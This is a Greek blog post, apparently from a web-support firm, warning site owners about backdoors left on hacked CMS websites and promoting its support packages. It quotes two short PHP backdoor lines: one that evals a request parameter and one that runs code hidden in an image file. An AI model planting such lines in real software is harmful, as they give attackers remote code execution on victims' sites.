Please enable JS

Backdoors

Backdoors

19 Φεβ 2016 /
Backdoors

Τι κάνετε για την ασφάλεια της ιστοσελίδας σας; Έχετε φροντίσει να παρθούν όλα τα απαραίτητα μέτρα για την αποφυγή… καταστροφής; Πως αντιμετωπίζει το Google τις hackαρισμένες ιστοσελίδες που βρίσκει στον κατάλογό του;

Η λέξη που χαρακτηρίζει το hackαρισμα μιας ιστοσελίδας είναι «μεγάλο πρόβλημα». Η λέξη που χαρακτηρίζει την μη έγκυρη αντιμετώπιση ή την μη ύπαρξη υποστήριξης ασφάλειας όμως, είναι «καταστροφή»!!!

Το να πέσει κάποια ιστοσελίδα θύμα κακόβουλων ανθρώπων, είναι κάτι συνηθισμένο. Τα CMS που χρησιμοποιούνται για το στήσιμο των ιστοσελίδων αποτελούνται από χιλιάδες αρχεία και εκατοντάδες χιλιάδες γραμμές κώδικα. Τι γίνεται όταν κάποιος «καλός άνθρωπος» ανακαλύψει ένα κενό ασφαλείας σε κάποια ιστοσελίδα και την hackάρει;

Τις περισσότερες φορές, αργά η γρήγορα ο ιδιοκτήτης του site θα κληθεί να πάρει μέτρα (κοινώς, να διορθώσει τα προβλήματα) και το website θα επανέλθει, λογικά, στην πρότερη κατάστασή του. Νομίζετε ότι αυτό ήταν όλο;

Οι «καλοί άνθρωποι» που προκαλούν την ζημιά σε μια ιστοσελίδα, γνωρίζουν ότι αυτή θα διορθωθεί κάποια στιγμή. Και τι κάνουν για αυτό; Πριν προκαλέσουν την αρχική ζημιά, φροντίζουν να εγκαταστήσουν μια κερκόπορτα. Ένα backdoor από το οποίο θα μπορούν ανενόχλητοι να ξαναμπούν στην σελίδα και να προκαλέσουν ξανά είτε το ίδιο είτε κάποιο διαφορετικό πρόβλημα.

Τα backdoor έχουν εξελιχθεί τόσο που πλέον δεν μοιάζουν καν σαν backdoor!!! Παλιότερα ήταν κωδικοποιημένες γραμμές κώδικα που εύκολα ή δύσκολα αναγνωρίζονταν μετά από ένα εκτεταμένο scanning όλων των αρχείων της ιστοσελίδας.
Συνήθως υπήρχε κάτι σαν «eval (base64_decode» που κωδικοποιούσε το κακόβουλο λογισμικό.

 

Τι λέτε για τον παρακάτω κώδικα;

if (isset($_REQUEST[‘asc’])) eval(stripslashes($_REQUEST[‘asc’]));

Είναι κωδικοποιημένος; ΟΧΙ. Είναι backdoor; ΝΑΙ, είναι!!! Για την ακρίβεια επιτρέπει στον hacker να εκτελέσει οποιοδήποτε κώδικα, να προσθέσει ή να αφαιρέσει αρχεία κλπ κλπ.

 

Τι λέτε για αυτό το κομμάτι κώδικα;

wp__theme_icon=create_function(”,file_get_contents(‘/path/wp-content/themes/themename/images/void.jpg’));$wp__theme_icon();

Είναι κωδικοποιημένος; ΟΧΙ. Είναι backdoor; ΝΑΙ, είναι!!! Αυτή την φορά το κακόβουλο λογισμικό είναι κρυμμένο μέσα στην φωτογραφία void.jpg!!!

 

Το πρόβλημα γιγαντώνεται αν σκεφτεί κανείς ότι αυτά είναι ελάχιστα κομμάτια κώδικα που χάνονται εντελώς μέσα στις εκατοντάδες χιλιάδες γραμμές κώδικα που υπάρχουν πλέον στις ιστοσελίδες.

Εσείς τι κάνετε λοιπόν, για την ασφάλεια της ιστοσελίδας σας; Απλά την κατασκευάζετε και την αφήνετε στην τύχη της; Τι συμβαίνει στο Google και στην καταχώρηση σας, όταν η σελίδα σας χαρακτηριστεί ως hackαρισμένη; ΑΠΛΑ… ΚΑΤΑΣΤΡΟΦΗ!!! Η σελίδα σας κατακρημνίζεται στα αποτελέσματα της μηχανής αναζήτησης και όταν κάποιος την βρει και την επιλέξει, εμφανίζεται μια κατακόκκινη οθόνη ειδοποίησης που αποτρέπει τον χρήστη να την προβάλει!!!
Περιττό να πούμε και να τονίσουμε πόσο σημαντικό είναι αυτό για την επιχείρηση σας.

Google report

Μην αφήνετε τίποτα στην τύχη του. Φροντίστε να επιλέξετε ένα πακέτο υποστήριξης και να γνωρίζετε επακριβώς τι σας προσφέρει.
Καλέστε μας στο 2441 500500 για να συζητήσουμε την δική σας περίπτωση